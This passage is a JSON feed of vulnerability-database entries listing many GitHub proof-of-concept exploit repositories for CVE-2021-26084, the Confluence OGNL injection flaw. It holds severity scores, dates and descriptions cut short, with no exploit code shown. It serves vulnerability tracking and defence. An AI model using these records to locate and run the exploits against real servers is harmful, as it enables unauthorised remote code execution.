"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:33:44", "description": "# CVE-2021-26084_PoC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T07:33:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-01T09:03:37", "id": "2BE90BD5-68B3-521E-B2DF-923D04CC1189", 
"href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:51", "description": "# CVE-2021-26084-Confluence-OGNL\nasjhdsajdlksavksapfokaajsdlksaj...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-06T06:55:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-06T06:58:34", "id": "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:58", "description": "# confluence-rce-poc\nSetting up ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, 
"impactScore": 5.9}, "published": "2021-09-04T14:53:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-04T15:16:43", "id": "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:37", "description": "# Confluence Server Webwork Pre-Auth OGNL Injection (CVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T03:11:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-02T03:16:43", "id": "CE477D7E-7586-5C82-8DCC-033C48461E66", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:20", "description": "# Confluence_CVE-2021-26084\nRemote Code Execution on Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T12:19:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-26T06:18:41", "id": "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:59", "description": "# CVE-2021-26084\n\n- An OGNL injection vulnerability exists that ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-16T03:56:14", "id": "4A995433-D0C6-5BF7-9A78-962229397A7D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:10:07", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-13T01:55:30", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution 
on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-12T08:46:05", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T12:49:04", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-12T08:46:05", "id": "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-19T18:17:57", "description": "* CVE-2021-26084\n--------\n** Description\n - POC of CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T06:29:51", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-19T15:09:22", "id": "C0A9F032-9822-59DC-94CC-20C15DEE0FED", 
"href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T12:56:33", "description": "# CVE-2021-26084 - Confluence Server Webwork OGNL injection\n\n- A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:15:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-11T16:16:03", "id": "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T03:22:59", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-05T00:01:16", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-23T12:57:50", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-20T13:25:44", "description": "# CVE-2021-26084\nCVE-2021-26084\uff0cAtlassian Confluence OGNL\u6ce8\u5165\u6f0f\u6d1e\n\nA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-26T06:01:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-20T09:26:02", "id": "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-20T05:31:08", "description": "# CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection\n### U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:45:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-20T00:59:13", "id": "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-01T00:29:34", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-13T09:42:12", "description": "# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injectio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T23:33:44", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-13T08:40:52", "id": "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-04T07:34:57", "description": "# 
CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 